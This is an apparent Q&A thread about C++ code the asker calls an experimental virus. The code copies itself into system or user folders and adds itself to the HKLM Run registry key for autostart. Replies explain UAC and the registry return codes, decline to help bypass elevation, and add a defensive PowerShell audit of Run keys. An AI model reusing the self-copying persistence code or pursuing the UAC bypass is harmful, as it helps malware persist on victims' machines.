I'm writing an experimental virus for my school project. It should copy itself and start itself. I started with this article, and I came to this:

    #include <windows.h>
    #include <iostream>
    #include <tchar.h>
    #include <stdio.h>
    using namespace std;

    void main()
    {
        wchar_t system[MAX_PATH];
        wchar_t user[MAX_PATH];
        wchar_t pathtofile[MAX_PATH];
        HMODULE GetModH = GetModuleHandle(NULL);
        DWORD bufSize = MAX_PATH;
        GetModuleFileName(GetModH, pathtofile, sizeof(pathtofile));
        GetSystemDirectory(system, sizeof(system));
        std::wstring s(system);
        s += std::wstring(L"\\virus.exe");
        WCHAR* sysfull = &s[0];
        if(!CopyFile(pathtofile, sysfull, false))
        {
            sysfull = L"C:\\Users\\Public\\virus.exe";
            if(!CopyFile(pathtofile, sysfull, false))
            {
                GetUserName(user, &bufSize);
                std::wstring u(L"C:\\Users\\");
                u += std::wstring(user);
                u += std::wstring(L"\\Documents\\virus.exe");
                sysfull = &u[0];
                CopyFile(pathtofile, sysfull, false);
            }
        }
        HKEY hKey;
        bool t = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
        bool t1 = RegSetValueEx(hKey, L"Writing to the Registry Example", 0, REG_SZ, (const unsigned char*)sysfull, sizeof(system));
        RegCloseKey(hKey);
        MessageBox(NULL, L"Hello", L"Messagebox Example", MB_OK);
    }

The problem is when I look in regedit under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there is no new key. RegOpenKeyEx and RegSetValueEx return true, and everything seems to be working fine, but it isn't, and I have no idea why.

I'm on Windows 8 and using VS12.

Firstly, void main isn't legal C++. Secondly, read the docs more closely. They don't even have a boolean return type, so I don't know where you got true from, but if one did, it would mean failure. Commented Oct 5, 2013 at 20:29

1 Answer

Windows Vista and later block write access to certain sensitive locations like the HKEY_LOCAL_MACHINE_KEY, C:\Windows, etc., via a mechanism known as UAC. If UAC is enabled (which it is, by default), admin-level users by default have a reduced set of privileges and programs need to use a technique known as elevation to gain full administrator privileges. Alternatively, you can launch your program as administrator via the right-click menu to give it full access.

Either way, with UAC turned on the user needs to approve the elevation via a dialog before the permissions are granted.

The registry functions like RegOpenKeyEx() return 0 on success, and an error code on failure - not true/false. If you check the return code properly you'll see they're returning 5 which is ERROR_ACCESS_DENIED.

2 Comments

Considering this is supposed to be a virus, elevation doesn't seem like a solution. Is there any other way to make the program start on startup?
I'm not really comfortable helping you write a virus, even if it is for a school project. If you do some research you might find ways around it - I'm just explaining how the system works.
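An added example, not code from the question or the answer, showing the other side of what the answer describes: an administrator auditing the Run keys this thread is about. Reading them needs no elevation, the real Win32 error is reported instead of being coerced into a bool, and the write-access probe shows the ERROR_ACCESS_DENIED behaviour a non-elevated process gets on the HKLM key. The "user-writable" path fragments are my own assumption about what is worth flagging.

```powershell
# Added example (not from the question or answer): audit the autorun entries the
# thread discusses. Reading needs no elevation; errors are surfaced, not squashed.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
# Assumed list of locations a non-elevated process can write to; an autorun
# command living there deserves a closer look (the question's fallback paths are here).
$userWritable = @('\Users\Public\', '\Documents\', '\AppData\', '\Temp\')

function Get-RunKeyEntries {
    foreach ($key in $runKeys) {
        try {
            $props = Get-ItemProperty -Path $key -ErrorAction Stop
        } catch {
            # Access denied (Win32 error 5) or a missing key lands here; report it.
            Write-Warning "$key : $($_.Exception.Message)"
            continue
        }
        $props.PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' } |
            ForEach-Object {
                $value = [string]$_.Value
                [pscustomobject]@{
                    Key        = $key
                    ValueName  = $_.Name
                    Command    = $value
                    Suspicious = [bool]($userWritable | Where-Object { $value -like "*$_*" })
                }
            }
    }
}

# The check the answer describes: opening the HKLM Run key for writing from a
# non-elevated process fails with a SecurityException (ERROR_ACCESS_DENIED underneath).
function Test-HklmRunWritable {
    try {
        $k = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
            'Software\Microsoft\Windows\CurrentVersion\Run', $true)
        if ($k) { $k.Close(); return $true }
        return $false
    } catch [System.Security.SecurityException] {
        return $false
    }
}

Get-RunKeyEntries | Format-Table -AutoSize
"HKLM Run key writable from this process: $(Test-HklmRunWritable)"
```

Run it once normally and once from an elevated prompt to see the writability probe flip, which is exactly the UAC split the answer explains.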
